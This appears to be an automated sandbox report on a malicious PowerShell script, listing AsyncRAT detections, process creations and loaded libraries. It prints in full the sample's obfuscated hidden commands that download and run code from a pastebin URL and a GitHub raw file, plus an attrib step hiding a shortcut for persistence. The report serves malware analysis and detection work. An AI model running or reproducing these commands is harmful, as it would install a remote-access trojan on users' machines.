Source: amsi64_5812.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPE | Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPE | Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: powershell.exe PID: 316, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4860, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5812, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winPS1@27/29@4/5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\lUsD8dOCffz6TR7t
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1304:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_geq1rn3w.xcx.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5818.tmp" "c:\Users\user\AppData\Local\Temp\thvmfbzv\CSC2C6CB80D24664034BBA8B61A4D73B8EB.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A1.tmp" "c:\Users\user\AppData\Local\Temp\s4dvafav\CSC36361158E42F4D2FBFD4DCE2A4FFFFB.TMP"
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5818.tmp" "c:\Users\user\AppData\Local\Temp\thvmfbzv\CSC2C6CB80D24664034BBA8B61A4D73B8EB.TMP"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A1.tmp" "c:\Users\user\AppData\Local\Temp\s4dvafav\CSC36361158E42F4D2FBFD4DCE2A4FFFFB.TMP"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
              Source: C:\Windows\System32\forfiles.exe Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
